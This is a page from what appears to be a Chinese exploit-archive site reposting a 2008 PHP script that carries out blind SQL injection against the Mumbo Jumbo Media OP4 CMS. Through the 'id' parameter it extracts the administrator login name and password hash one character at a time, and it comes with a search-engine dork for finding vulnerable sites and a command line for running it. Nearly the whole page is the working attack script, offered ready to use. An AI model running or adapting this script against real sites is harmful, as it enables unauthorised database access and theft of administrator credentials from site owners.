首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit
来源:www.vfocus.net 作者:Lidloses 发布时间:2008-04-14  
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#   Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit    
#                                                            
#      Vulnerability discovered by: Lidloses_Auge            
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   Free-Hack, GPM
#      Date:                        13.04.2008
#
###############################################################
#                                                            
#      Dork:  "mumbo jumbo media" + inurl:"index.php"
#      Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID]
#      Example for "http://www.site.com/cms/index.php?id=300"
#      => php '.$argv[0].' http://www.site.com/cms/ 300 1
#                                                            
###############################################################
');
if ($argc > 1) {
print_r('
');
   echo 'Searching for Admin: ';
   for($i=1; $i <= 50; $i++) {
      $temp1 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kennung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--');
      if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=48; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
         if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 96;
         }
      }
   }
print_r('
');
   echo 'Searching for Hash:  ';
   for($i=1; $i <= 32; $i++) {
      for($zahl=48; $zahl <= 102; $zahl++) {
         if ($check = 0) {
            $temp2 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--');
            if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0) {
               $zahl = 97;
               $check = 1;
            }
         }
         $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
         if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
            echo chr($zahl);
            $zahl = 102;
         }
         if ($zahl == 57) {
            $zahl = 97;
         }
      }
      $check = 0;
   }
}
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XM Easy Personal FTP Server 5.
·HP OpenView NNM v7.5.1 ovalarm
·1024 CMS <= 1.4.2 Local File I
·KwsPHP (Upload) Remote Code Ex
·Borland InterBase 2007 ibserve
·LightNEasy 1.2 (no database) R
·DivX Player <= 6.7.0 SRT File
·LiveCart <= 1.1.1 (category id
·BigAnt Server 2.2 PreAuth Remo
·KnowledgeQuest 2.5 Arbitrary A
·BS.Player 2.27 Build 959 SRT F
·phpBB Add-on Fishing Cat Porta
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved